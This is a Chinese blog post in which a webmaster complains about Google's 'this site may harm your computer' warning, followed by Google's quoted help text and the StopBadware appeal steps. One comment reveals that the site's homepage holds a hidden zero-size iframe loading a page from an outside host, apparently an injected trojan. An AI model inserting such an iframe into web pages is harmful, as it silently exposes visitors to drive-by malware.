小心你的网站被stopbadware


从前只听说过,如今身受其害,莫明其妙的,google竟然给我的网页摘要打个“该网站可能会损害您的计算机。”的烙印,这是哪个网站管理者也不愿意接受的。况且我是清白的。
google凭什么认定我的网站有害呢?原因木有说明。
还有google判定的问题,为什么又要站长找StopBadware.org申诉??

并不是我一个提出类似的疑问,google一下,可以找到N多相关结果。比如下面的:
Google 错误地将我的网站提示为”该网站可能会损害您的计算机”,请解决!!!
Google发布网站“恶意软件”警告引发争议
谷歌(google)你这样算不算作恶?

------------------来自google的说明----------------
为什么有些搜索结果会显示“这个网站有可能会损害您的计算机“?

该警告信息会显示在我们认为可能会包含恶意软件的搜索结果中。我们希望用户在搜索网页时感觉更安全;为了增强对用户的保护,我们一直不懈努力于确认这种危险网站。

恶意软件通常是在您访问这些站点时,在您毫不知情或未经您允许的情况下被安装的。恶意软件的例子包括在您的计算机里删除数据;盗窃密码和信用卡号等一系列的个人信息;或者更换您的搜索结果。如想了解更多关于这种类型站点的信息,请您访问 http://www.stopbadware.org/home/help

如果您担心您的计算机上已经安装了恶意软件,请访问 http://www.google.com/support/bin/answer.py?answer=8091 ;在这里您可以获得如何从您的系统里删除恶意软件的信息。

如要了解如何举报某网站违反了我们的网站管理员指南,请您访问 http://www.google.com/support/bin/answer.py?answer=16162

如果您是已由我们确认站点的管理员,请访问 http://www.google.com/support/webmasters/bin/answer.py?answer=45432

--------------解决办法-------------
我的网站被误认为是传播恶意软件的网站。该如何纠正?

所有申诉均由 StopBadware.org 处理。请向 appeals@stopbadware.org 发送电子邮件,陈述您认为网站被误解的理由。他们会进行调查,并就调查结果与您联系。如果判定您的网站没有传播恶意软件,他们就会通知 Google,再由 Google 从搜索结果中删除该识别标记。

小心你的网站被stopbadware》上有2条评论

  1. 管理员,你网站首页的源码里有一段
    <iframe src=http://pp.900666.com/c.htm width=0 height=0></iframe>
    这明显是被别人挂了木马啦,所以出现该提示是正常的。
    这是跨站攻击。

评论已关闭。